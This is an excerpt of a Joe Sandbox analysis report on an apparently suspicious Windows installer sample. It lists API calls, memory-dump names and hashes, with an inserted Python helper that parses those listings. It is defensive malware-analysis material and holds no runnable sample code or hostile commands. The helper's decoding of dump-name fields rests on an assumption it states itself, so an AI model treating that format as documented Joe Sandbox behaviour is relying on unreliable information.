                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
• Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
• Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4

APIs
• VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
Memory Dump Source
• Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_________.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
• Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
• Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19

APIs
• GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C6
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: PrivateProfileString
• String ID:
• API String ID: 1096422788-0
• Opcode ID: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
• Instruction ID: 80fa8228d7b44b53eec3e7c38ed93a9451a1703e345daa2b135a9f68ba926bbf
• Opcode Fuzzy Hash: 72cdf40c1bf6f5db5f4d9709fda42ed23ef015487cba6367b71ebc3a35df21ba
• Instruction Fuzzy Hash: 38E04F30800204BADB00AFA0CD49EAE3B78BF11344F20843AF581BB0D1E6B895809759

APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
• Instruction ID: f4c604eae2506afdbcc8ec41f9b2bc8be0b1ceb91ea8510f154d928e9cd5b687
• Opcode Fuzzy Hash: c271530863e58661098a5c30559a627ee948be805f1aaa302f87f5e4c73ddd49
• Instruction Fuzzy Hash: A4D012B2B08100D7DB10DFE59A08ADDB7699B10329F304A77D101F21D0D2B885419A2A

APIs
• SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
• Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
• Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
• Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09

APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
• Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
• Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
• Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D

APIs
• Sleep.KERNELBASE(00000000), ref: 004014E6
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                                  • Instruction ID: ad5cbb4e8c7f0aba0b65fecb58585b4f8dfec95c15ef4476e698ddf4bc3863dd
                                                                                                                                                  • Opcode Fuzzy Hash: 35c76f566c1ebd9d6b02c32a207bcdc7b8f69ffae950b4dd1e6fa8c4e5a5d930
                                                                                                                                                  • Instruction Fuzzy Hash: 05D0C77771414097D750DBB86E8585B73ACD7513197204C73D542F1491D178D8018939
APIs
• GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
Memory Dump Source
• Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_________.jbxd
Similarity
• API ID: AllocGlobal
• String ID:
• API String ID: 3761449716-0
• Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
• Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
• Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
APIs
• GetDlgItem.USER32(?,00000403), ref: 00405332
• GetDlgItem.USER32(?,000003EE), ref: 00405341
• GetClientRect.USER32(?,?), ref: 0040537E
• GetSystemMetrics.USER32(00000015), ref: 00405386
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
• ShowWindow.USER32(?,00000008), ref: 00405422
• GetDlgItem.USER32(?,000003EC), ref: 00405443
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
• GetDlgItem.USER32(?,000003F8), ref: 00405350
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
• GetDlgItem.USER32(?,000003EC), ref: 00405495
• CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
• CloseHandle.KERNEL32(00000000), ref: 004054AA
• ShowWindow.USER32(00000000), ref: 004054CE
• ShowWindow.USER32(?,00000008), ref: 004054D3
• ShowWindow.USER32(00000008), ref: 0040551D
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
• CreatePopupMenu.USER32 ref: 00405562
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
• GetWindowRect.USER32(?,?), ref: 00405596
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
• Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
• Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
• Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404619
• SetWindowTextW.USER32(00000000,?), ref: 00404643
• SHBrowseForFolderW.SHELL32(?), ref: 004046F4
• CoTaskMemFree.OLE32(00000000), ref: 004046FF
• lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
• lstrcatW.KERNEL32(?,Call), ref: 0040473D
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
  • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
  • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061E1
  • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
  • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\________.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 004061F5
  • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,75573420,00403512), ref: 00406208
• GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
• SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
• String ID: A$C:\Users\user\AppData\Local\foreslaaende$Call
• API String ID: 2246997448-2944485841
• Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
• Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
• Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
• Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
APIs
• CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
Strings
• C:\Users\user\AppData\Local\foreslaaende\Sluggardliness, xrefs: 004020FB
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\foreslaaende\Sluggardliness
• API String ID: 542301482-3939270230
• Opcode ID: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
• Instruction ID: b9114a0b4d3c9f05545c6126c0c632b8b73b1fcf7d0bd01aa9b6132af3d7cd36
• Opcode Fuzzy Hash: a0bb92f52aa57a686fb7670324366c30062890f5d7bc8498ec9199db5fdfdb62
• Instruction Fuzzy Hash: 4B414F75A00105BFCB00DFA4C988EAE7BB5AF49318B20416AF505EF2D1D679AD41CB55
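The bullets above are the raw material an analyst works from in a report like this: the per-function "APIs" lines (for instance the OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard run at 0x4055F7 to 0x405658 in the function that starts at 0x405332) and the .sdmp dump names repeated under every Memory Dump Source. The Python helper below is an added example, not Joe Sandbox code and not anything from the analysed sample. It parses the API bullets in exactly the form they take on this page, checks for the clipboard-write sequence in address order and decodes the clipboard format passed to SetClipboardData (0x0D is CF_UNICODETEXT in winuser.h), and splits the dump file names. The meaning of the dump-name fields is an assumption inferred from the values on this page (the region start 0x401000 next to "Offset: 00400000", and the 0x20, 0x02 and 0x04 values matching the Windows PAGE_* constants), not something the report documents; the sample lines in SAMPLE_APIS are copied from the listing above.

```python
"""Triage helpers for the per-function listings of a Joe Sandbox report.
Added example, not Joe Sandbox's or the sample's code; it parses the "APIs"
bullet lines and the .sdmp names in the form they take in the report above."""
import re
from collections import Counter

# Constructed input: bullets copied from the report's listing for the function
# at 0x405332 (a subset, in the order the report prints them).
SAMPLE_APIS = """\
• CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z_]\w*)"
    r"(?:\((?P<args>.*)\))?"  # argument list is optional (EmptyClipboard has none)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

CLIPBOARD_FORMATS = {0x01: "CF_TEXT", 0x02: "CF_BITMAP", 0x0D: "CF_UNICODETEXT", 0x0F: "CF_HDROP"}  # winuser.h
PAGE_PROTECTION = {  # winnt.h
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

def parse_hex(token):
    """Hex token -> int; '?' and names such as Function_00005267 -> None."""
    try:
        return int(token, 16)
    except ValueError:
        return None

def parse_api_lines(text):
    """'• Api.MODULE(args), ref: ADDR' bullets -> list of dicts.  Arguments are split on
    commas, which is enough for the numeric ones (a quoted path containing a comma would split too)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headers such as 'APIs' or 'Memory Dump Source'
        args = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": [a.strip() for a in args.split(",")] if args else [],
                      "ref": int(m.group("ref"), 16),
                      "subcall": int(m.group("sub"), 16) if m.group("sub") else None})
    return calls

def module_histogram(calls):
    """Number of call sites per module, subcall lines included."""
    return Counter(c["module"] for c in calls)

def find_clipboard_write(calls):
    """True if the function opens, empties, fills and closes the clipboard in address
    order; subcall lines belong to other functions and are skipped.  Also returns the
    clipboard format passed to SetClipboardData (0x0D -> CF_UNICODETEXT)."""
    direct = iter(sorted((c for c in calls if c["subcall"] is None), key=lambda c: c["ref"]))
    fmt_name = None
    for name in ("OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard"):
        for call in direct:  # the iterator keeps its position between names, so order matters
            if call["api"] == name:
                if name == "SetClipboardData" and call["args"]:
                    fmt = parse_hex(call["args"][0])
                    fmt_name = CLIPBOARD_FORMATS.get(fmt, None if fmt is None else f"0x{fmt:X}")
                break
        else:
            return False, None
    return True, fmt_name

def decode_dump_name(name, image_base):
    """Split an 8-field '.sdmp' name.  Assumption inferred from this report, not from any
    Joe Sandbox documentation: field 3 is the region start and field 4 the Windows page
    protection; the rest is returned raw.  image_base is the report's 'Offset:' value."""
    fields = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name layout: {name}")
    region_start, prot = int(fields[3], 16), int(fields[4], 16)
    return {"region_start": region_start,
            "protection": PAGE_PROTECTION.get(prot, f"0x{prot:X}"),
            "offset_in_image": region_start - image_base,
            "raw_fields": fields}

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_APIS)
    print(module_histogram(calls), find_clipboard_write(calls))
    print(decode_dump_name("00000001.00000002.1622740996.0000000000401000"
                           ".00000020.00000001.01000000.00000003.sdmp", image_base=0x400000))
```

Run on the sample lines, the histogram gives USER32 six and KERNEL32 four call sites, the clipboard check returns (True, "CF_UNICODETEXT"), and the first dump name decodes to a PAGE_EXECUTE_READ region at RVA 0x1000 of the image based at 0x400000. The same regex accepts the other listings on this page, including lines such as lstrcmpiW.KERNEL32(Call,004226D0,...) whose arguments are strings; the only known weak spot is the comma split on quoted paths that themselves contain commas.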
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
• Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
• Opcode Fuzzy Hash: d555c6e09dbf6ad66d53053e92e2a3446f724d402b29968be0a2f1aefd2bf89d
• Instruction Fuzzy Hash: 81F05EB1614114DBDB00DBA4DD499AEB378FF14318F20097AE141F31D0D6B45940DB2A
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040436A
• GetDlgItem.USER32(?,000003E8), ref: 0040437E
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040439B
• GetSysColor.USER32(?), ref: 004043AC
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043BA
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C8
• lstrlenW.KERNEL32(?), ref: 004043CD
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043DA
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043EF
• GetDlgItem.USER32(?,0000040A), ref: 00404448
• SendMessageW.USER32(00000000), ref: 0040444F
• GetDlgItem.USER32(?,000003E8), ref: 0040447A
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BD
• LoadCursorW.USER32(00000000,00007F02), ref: 004044CB
• SetCursor.USER32(00000000), ref: 004044CE
• ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E3
• LoadCursorW.USER32(00000000,00007F00), ref: 004044EF
• SetCursor.USER32(00000000), ref: 004044F2
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404521
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404533
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: CB@$Call$N$open
• API String ID: 3615053054-4184941720
• Opcode ID: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
• Instruction ID: ed67d3ceb40554f4a20f9fe4cecdec295417cbe43b6f72f0b7bb3cee00e3d4b7
• Opcode Fuzzy Hash: 2203d86e9aedfb02f953f7f44e7e92c7d68489696ba88c708ebc1c14ae09885d
• Instruction Fuzzy Hash: 037173B1A00209BFDB109F64DD45A6A7B69FB84315F00813AF705BA2D0C778AD51DF99
APIs
• lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C18
• CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAC,?,?,00000001,00405924,?,00000000,000000F1,?), ref: 00405C3C
• GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C45
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
  • Part of subcall function 00405ABB: lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
• GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C62
• wsprintfA.USER32 ref: 00405C80
• GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CBB
• GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CCA
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D58
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D6A
• GlobalFree.KERNEL32(00000000), ref: 00405D71
• CloseHandle.KERNEL32(00000000), ref: 00405D78
  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
• String ID: %ls=%ls$NUL$[Rename]$p]B$peB
• API String ID: 1265525490-3322868524
• Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
• Instruction ID: dd28b8746f6bac9015e409c36d2f5baf321d2fce784c03eddf9b1c2e257c4ca8
